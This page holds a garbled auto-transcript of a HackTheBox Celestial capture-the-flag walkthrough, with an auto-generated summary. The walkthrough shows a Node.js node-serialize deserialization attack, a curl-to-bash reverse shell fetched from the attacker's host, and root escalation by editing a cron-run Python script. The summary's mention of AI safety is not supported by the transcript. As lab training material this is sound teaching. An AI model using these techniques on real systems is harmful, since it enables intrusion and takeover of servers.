HackTheBox - Celestial

IppSec · Intermediate ·🔧 Backend Engineering ·7y ago

Key Takeaways

The video demonstrates how to exploit a Node.js serialization bug to achieve code execution and gain a root shell on a HackTheBox machine, utilizing tools such as Burp Suite, Node.js, and Python. The exploitation process involves using a cron job, a serialized object, and an immediately invoked function expression (IIFE) to execute code and gain access to the system.

Full Transcript

what's going on YouTube this is if second we're doing celestial from hack to box first off I want to apologize the video be a bit shorter and choppier than normal because well it's the change of a season which means I have bad allergies hopefully next week I'll be back to normal and talking won't be as painful so that being said celestial was a pretty good bucks to get the user shell I didn't like the probe ask the user you have to dig into new DC ization attacks and have all the languages no DC realization is the easiest to understand because it passes usually it passes the serialized object straight into eval so we're digging to that see that and if you've ever mastered no civilization I'd recommend looking into python pickle then PHP and then java with gadgets the previs was just a cron job you find it you edit a Python script wait a few minutes and then you get a root shell so let's jump in and draw an end map with - SC for default scripts as via memory versions okay up with all formats put this man I'm a protein called celestial then the IP address which is 1010 1085 does take some time to run so I've already ran it looking at the results we see only one port is open that is port 3000 it's advertising itself as an HTTP web service and it's saying it's the node.js Express Framework Express is just a framework built upon nodejs much like django and flask or related a Python rails and Ruby laravel and cake to PHP Express is just built upon no js' which is a web server built around javascript so unlike the previously mentioned django flask rails whatever this one just uses one programming language for both the front end and the back end what makes it really easy to make web applications instead of web pages because well the front-end developers can write back-end code the back-end developers can write front-end code and they can all join together and write crappy code as one so let's take a look at the web page I'm going to 1010 1085 put 30,000 we just get a 404 error if we make this a vow you're Ellen put a slash we get hey dummy 2+2 is 22 so we're gonna do what we always do and run recon in the background as we go along so go Buster - H we want to use the word list and use a share word Wistar buster then directory list 2.3 medium then let's see the - you four URL so ten ten ten eighty five point three thousand and one specify the Alf file as go Buster logged we may have to do HTTP and SEO word list does not Oh - oh now - W - I was out file so looking at this page let's just go send it to burp and see what burp says about it so turn intercept on refresh the page refresh oh use burp suite I had the wrong thing checked go here and we see it already assigned us a cookie it is base64 encoded so let's just quickly go to the decoder tab smart decoder it's going to decode the URL percent 3d - the equal signs then we can say decode as base64 decode as base64 I wonder what I did there that was odd but we get just a JSON object and this is num equals two so if we put num is equal to let's do 100 then encode this as base64 then encode this again as URL and then we can just paste this into the profile and see what it says so without editing it hey dummy 2+2 is 22 and with editing it 100 plus 100 is a hundred 100 so it looks like they're just concatenated the number putting it twice and then that's what the answer is the key thing to know is the webserver utilizing the cookie some hell and it's going through some type of sea relized object so i'm going to turn my intercept off and we can go and google for node j s serialize vulnerability and see what shows up exploit new jsd serialization bug from code execution sounds like a winning bet so looking over this we see untrusted data passin done serialize function can be exploited to achieve code execution by passing a serialized javascript object with a immediately invoked function expression i IFE this piece actually isn't needed and we'll dig into the code to find out why but going down we do have a little bit of source code so here's them building the payload and we're creating a serialized object and node or a javascript and then just printing it out to the output and we can see this is what it looks like it creates the RCE object then does this underscore $1 dollar and e underscore function dollar dollar underscore then puts function and then creates the function so serialization is something that a lot of programming languages have vulnerabilities with no J is gonna be a little bit unique and how it does it but all these are good readings to do understanding PHP object Java DC ization rails it's Python with pickles everything's been played with sterilization exploits and the purpose of serialization is people to take any piece of code and convert it into a byte stream which is essentially just text and then be able to load it elsewhere so with node we're going to serialize a function and looking through the know serialize we're going to see it just evals the function when you pass code to eval you can just execute code so let's take this exploit and run it real quick or not exploit but their payload and gate so it works on our box I'm just gonna kill that go Buster because that isn't needed just a good habit to always have background recon going in the background so let's make a new directory called exploit - dev and then we're gonna do npm install node serialize I think is the up library they use there we go and you can make payload J s set move to paste paste their code in and just do node payload and we see it outputs the theorized object so what we want to do is go into the node modules which NPM had installed going to node Ciara lies and let's grep for exactly what nd func does and kind of trace this so I'm just gonna copy this grep hand was misplaced grab - capital R for recursive I so it's case insensitive ND function and we'll start it our current working directory we see lib serialize j s utilizes this so if we look at this we see it right at the top nd func gets to clear it as func flag so let's just search for this and actually I'm going to switch to VI for syntax highlighting and there's probably a key unless to do syntax highlighting but I don't know that a key off top my head so the next thing is it's just putting output object is equal to function flag plus function string and then after that we see it grabbing the index of zero so I'm guessing it did a split on function flag and the left hand side is just function flag and the right-hand side is function string and what we do is the next thing if we find that flag send it over into eval and when you eval code again that's code execution you should never pass user input into eval so that's why this method of destabilization leads to code execution and Java you need to use gadgets and PHP you need to do stuff with I think the wake-up it destructs calls but note is a bit unique and just passing stuff to eval which is why I said front-end developers and back-end developers can come together and write bad code so knowing that let us just go up a directory and up to directories and change our payload and we know we get output over at username so let's get rid of this and we're going to take the line of code at RCE and place that there so let's go back put this all a nice one-line DD delete it put it there backspace and that looks good so if we know payload get an unexpected token see whoops don't want that line there we go and we do see at doing a node DCI wise function right here so that looks all good copy this go to decoder paste copy and do this little dance paste it in the profile and it doesn't look like we actually execute a code so let's go back in the decoder and try getting rid of the quotes around a function and see if that does anything paste this in click go you know unexpected tokens so we need that there so we can go back and try that immediately invoked function expression if we go back to the page let's see we add parentheses looks like after this guessing we can add it here maybe let's see what happens it can't be too much so we hit invalid username type so the application detected I guess that we put a function where the username should go so let's get rid of the IIF e that I had said and also get rid of function and we also want to get rid of this bracket and the tailing bracket so let's copy this and paste and we get a unexpected token of a semicolon so let's just remove that and see if it's happy then copy too much and here we go we get hey object object 9000 one plus nine thousand one is nine thousand one nine thousand one so we probably know we have code execution at this point and if we want to we can copy this because the fonts bigger here if you were having trouble seeing this call this payload text and all this does is under user name it evals this code so remember if we go back to that nude to serialize function it just pretty much splits this into two things and that says okay if the very first part equals this then eval this and when eval was a function I guess the program couldn't display the function and air it out however when eval was just line of code and ran this in return Dean object which then we see here so we could try something like straying standard out see what this does if we want to try to print the results of this I'm not sure if we're gonna be able to see still says object let's try json dot stringify it's an odd thing but that's JavaScript base this so I'm not sure exactly how to convert this into a string so it gets displayed you probably write a few lines to do it but we have code execution if we want to we can further verify that by my favorite thing is just pinging us so instead of LS let's do ping 10 10 14 13 I think is my IP and let's do - and - I think that's the count so TCP dump - i ton zero ICMP copy this paste this and it didn't ping us if config tun 0 10 10 14 13 that was correct Zek 10 10 14 13 one of his not - am is it - see and - hands windows probably so let's do - C to copy this paste and we get two pings so we have code execution we could just now create a dub dub dub directory and then go to our virtual cheat sheet let's copy this and we'll do Python now we can try bash first try this so we can do shell dot SH and then 10 10 14 13 port 9001 start a web server and listen on port 9001 go back to Dakota and set a ping we want to do curl 10 10 14 13 shell SH copy this paste it in click go got it we forgot to pipe it to bash so pipe bash so we execute whatever curl sees click go and we have a shell there's other things you could do like MSF venom we get about web server we do - L payload grep node we could use MSF atom or like a open source tool I think let's see no js' shell is another one to just have a node shell instead of piping it to executing coal and doing a shell command we could all do it within no to get a shell but I just do it this way so you do I miss the venom - P this o host 10 10 14 13 l port 9001 and then this will output code that you copy and paste and if you did it this way because it outputs so much junk take a note at exactly what um no J a shell did and convert it to character Koon and then do an eval string from care code because you'll just avoid all the bad characters essentially it's just gonna put a bunch of I think the octal values and then it decodes it then executes sit but I find just doing the exact the easiest way because it translates beyond between all the languages so another that let's get into the actual probe esque which I didn't find that interesting but let's copy opt when improv asked when he Noom start a web server up again then Curl Curl 10 10 14 13 when he knew sh he's cute bash with it here we go now it's listening that's odd and it looks like it's pretty much finished so let's go to the top when and see what we see so we have Ubuntu 1604 xenial the host name is Sun a current groups or in the ADM sudo and I think there's the interesting groups a DM can read log files in sudo maybe or just to do sudo su keep going see what else we see some other admin users passwd nothing too interesting their accounts we see that home pseudo have been successful so at one point this user was a member of pseudos and I'm guessing this is just when you want to installs so let's go check that out real quick sudo - L know TTY present so let's do Python C input PT YPT why not spawn and - and then control Z s TTY raw - echo F G now we got a real shell sudo - L and what's the password so we don't know the password for this we could go like verb dub HTML doesn't exist PS EF grep node so it's in home son and we can look at server JSC if it has any passwords got the cookie the default cookie at sets but nothing there so the next thing to do is look at the logs so we go over log and one again we can read these because we're admin we can tale let's just make this bigger last thousand lines of syslog and see what we have a bunch of syntax errors and we see a cron job running home son document script by typing in here so let's see if we can execute this and we see it's running as root so CD and home son documents LS dash L a script PI we can write to the script so then VI and let's just do a reverse shell so go back to a reverse shell cheat sheet Python and put this in and we should change or IP address so let's do 10 my shell was acting weird 10 10 14 13 will change the port to be 9,000 - okay whoops wrong one and CoV NP 9,000 - let's execute the script to make sure it works we do get a connect exit and now we just wait for the five-minute mark so it's got another 4 minutes until this grip should run and I think I didn't explain how I did that so if we grep cron on syslog we see that's every yeah 5 minutes I don't know why it ran here oh this is austria learning cron but we see 1625 1630 1635 1640 so it looks like the script runs every 5 minutes so I'm going to pause the video and Annabelle four minutes we should get a callback as route on this port and there we go we got a shell so if we do the ID we are now route we can go into route and do WCC route text and we can read that so that is a box let us go back a little bit and do this the way probably most people did and that's with the nodejs show I haven't actually done that so this will be a little bit of a learning experience for me but hey that'll be fun so let's go back into our exploit dev go in a payload j/s and let's change this to be please subscribe and we can just do the RC e is equal to code okay let's go grab this the shell J s set paste and change the IPS oh it puts a host and output as arguments sweet so we just do nude shell ten ten fourteen thirteen forty nine thousand three no this is Python okay so Python shell o move show js2 shelled by Python shell ten ten fourteen thirteen nine thousand three so we have this eval string from care code so let's go back into payload and paste this in and let's go back to this page and see exactly how they want this function so we could probably just do that node function thing ND underscore func but let's do this the way the article says so function think like that that looks good no payload okay and we don't have that nd CLI so we did something wrong go back here let's see do we not put that in quotes there we go that's why I was looking for this nd funk so if we copy this go to poop decoder paste it I did not paste it copy paste copy this it's probably not gonna work because we didn't do that uh immediately invoke expression example I had said earlier so let's just paste this in and we don't need this w get anymore so let's just do it here LV MP said 9003 click go please get hey please subscribe if we go back to the decoder tab and we want to put let's see I want to say it was right here I just put the parentheses at the very end let's see if this works so no she'll go she'll so that's why how most people did it and we can remove that IIF e thing that I just mentioned but first copy this into a place where you can more easily read it so all I did and that Dakota tab was go to the end and then add this so it executes the function as soon as it sees it we could also just again execute this has a straight eval like that week at task J s this should work as well paste that in go back here no shell and hopefully we get a shell and shell so that's the way most people probably did the box again I like putting it in here because you could expand upon that instructing text and do this if there was a strict firewall and yeah so hope you guys enjoyed the box take care and I will see you all next week

Original Description

00:58 - Begin of Recon 03:00 - Looking at the web application and finding the Serialized Cookie 04:38 - Googling for Node JS Deserialization Exploits 06:30 - Start of building our payload 07:10 - Examining Node-Serialize to see what the heck _$$ND_FUNC$$_ is 09:10 - Moving our serialized object to "Name", hoping to get to read stdout 11:30 - Really busing the deserialize function by removing the Immediately Invokked Expression (IIFE) 13:25 - Failing to convert an object (stdout) to string. 14:02 - Verifying code execution via ping 15:32 - Code execution verified, gaining a shell (Get a shell via NodeJSShell at end of video) 18:49 - Reverse shell returned, running LinEnum.sh 21:26 - Examining logs to find the Cron Job running as root 22:09 - Privesc by placing a python root shell in script.py 24:15 - Going back and getting a shell with NodeJSShell
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 53 of 60

1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

This video teaches how to exploit a Node.js serialization bug to achieve code execution and gain a root shell on a HackTheBox machine. The exploitation process involves using a cron job, a serialized object, and an immediately invoked function expression (IIFE) to execute code and gain access to the system. The video demonstrates the importance of ai safety and ai security in preventing such exploits.

Key Takeaways
  1. Run recon in the background
  2. Use Burp Suite to intercept and decode the cookie
  3. Edit the cron job using a Python script
  4. Get a root shell using the cron job
  5. Exploit the Node.js serialization bug to achieve code execution
  6. Build a payload using Node.js and the serialize library
  7. Run the payload to see the output
  8. Search for the 'nd func' function in the Node.js library
  9. Understand how the 'nd func' function uses eval to execute code
💡 The video highlights the importance of properly securing Node.js applications against serialization vulnerabilities and the potential consequences of failing to do so, including code execution and root shell access.

Related Reads

📰
I built an AI powered API generator with FastAPI, PostgreSQL, Groq and Railway
Learn how to build an AI-powered API generator using FastAPI, PostgreSQL, Groq, and Railway for production-ready backend development
Dev.to · Anisa khan
📰
Learn Golang Step by Step: if, else if, else, and switch With Real Backend Examples
Learn how to use conditional statements in Golang with real backend examples to improve your programming skills
Medium · Programming
📰
Dev Log: 2026-07-01
Extract a theme-class seam from Livewire tables package to improve Blades functionality
Dev.to · Nasrul Hazim Bin Mohamad
📰
I built a native Android app in an afternoon, and I've never written a line of Kotlin
Learn how to build a native Android app without prior Kotlin knowledge, leveraging modern tools and frameworks to streamline development
Dev.to · Tilde A. Thurium

Chapters (14)

0:58 Begin of Recon
3:00 Looking at the web application and finding the Serialized Cookie
4:38 Googling for Node JS Deserialization Exploits
6:30 Start of building our payload
7:10 Examining Node-Serialize to see what the heck _$$ND_FUNC$$_ is
9:10 Moving our serialized object to "Name", hoping to get to read stdout
11:30 Really busing the deserialize function by removing the Immediately Invokked Ex
13:25 Failing to convert an object (stdout) to string.
14:02 Verifying code execution via ping
15:32 Code execution verified, gaining a shell
18:49 Reverse shell returned, running LinEnum.sh
21:26 Examining logs to find the Cron Job running as root
22:09 Privesc by placing a python root shell in script.py
24:15 Going back and getting a shell with NodeJSShell
Up next
Indian Express Editorial Analysis by Chandan Sharma - 1 JULY 2026 | UPSC Current Affairs 2026
StudyIQ IAS
Watch →